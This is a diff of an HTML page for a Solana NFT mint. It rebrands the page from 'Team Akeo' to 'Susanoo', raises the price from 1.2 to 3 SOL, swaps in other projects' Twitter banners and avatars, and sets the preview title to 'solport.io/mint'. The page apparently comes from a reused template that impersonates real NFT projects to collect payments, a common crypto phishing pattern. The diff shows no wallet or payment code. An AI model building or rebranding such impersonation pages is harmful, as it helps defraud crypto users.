--- a/index.html
+++ b/index.html
@@ -4,18 +4,18 @@
     <meta charset="utf-8">
     <meta name="description" content="NTC" data-react-helmet="true" />
     <meta name="theme-color" content="#000000" />
-    <meta content="🌐 teamakeo.launchlabs.app" property="og:title">
+    <meta content="🌐 solport.io/mint" property="og:title">
     <meta content="
-      🟢 Team Akeo Minting is NOW LIVE!
+      🟢 Susanoo Minting is NOW LIVE!
     
-      Mint Price: 1.2 SOL
+      Mint Price: 3 SOL
     " property="og:description">
-    <meta content="https://pbs.twimg.com/profile_banners/1425730526434844675/1653563793/1500x500" property="og:image">
+    <meta content="https://pbs.twimg.com/profile_banners/852514633093074944/1652114373/1500x500" property="og:image">
     <meta name="twitter:card" content="summary_large_image">
-    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/134" />
+    <link type="application/json+oembed" href="https://api.jsonbin.io/b/622184b37caf5d67835ed9ba/138" />
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
-    <title>Team Akeo</title>
-    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1529714372066816000/yWcs0eXD_400x400.jpg" />
+    <title>Susanoo</title>
+    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1533112918991982592/MPYVqiM-_400x400.jpg" />
     <link rel="stylesheet" type="text/css" href="css/all.min.css">
     <link rel="stylesheet" type="text/css" href="css/normalize.css">
     <link rel="stylesheet" type="text/css" href="css/style.css">
@@ -54,12 +54,12 @@
         <div class="main-area">
 
             <div class="main-area__right">
-                <h2 class="right-title">Team Akeo</h2>
+                <h2 class="right-title">Susanoo</h2>
 
                 <div class="right-list">
                     <li>
                         <div class="text">
-                            Private #Solana NFT collection backed by the leading NFT news Website.
+                            Susanoo (50/50) Dead with $Jutsu Building on the #Solana blockchain.
                     </li>
                     </div>
 
@@ -70,7 +70,7 @@
                             <a href="javascript:void(0)" class="plus-btn">+</a>
                         </div>
                         <div class="price-box">
-                            <div id="price-total"><span>1.2</span> SOL</div>
+                            <div id="price-total"><span>3</span> SOL</div>
                             <div>2 NFT max per transaction</div>
                         </div>
                     </div>
@@ -91,7 +91,7 @@
                 </style>
                 <div class="main-area__left">
                     <div class="slider-area">
-                        <img class="animation" src="https://cdn.discordapp.com/attachments/979939097156149271/980030663912734800/unknown.png" alt="GiF">
+                        <img class="animation" src="https://susanoo.io/img/desk/9.png" alt="GiF">
                     </div>
                 </div>
             </div>
@@ -107,7 +107,7 @@
         const $numberText = document.querySelector("#total");
         const $remaining = document.querySelector('#remaining');
         const $priceResultText = document.querySelector("#price-total span");
-        let itemPriceSelected = 1.2;
+        let itemPriceSelected = 3;
         let itemCount = 1;
 
         $plusButton.addEventListener("click", function(e) {
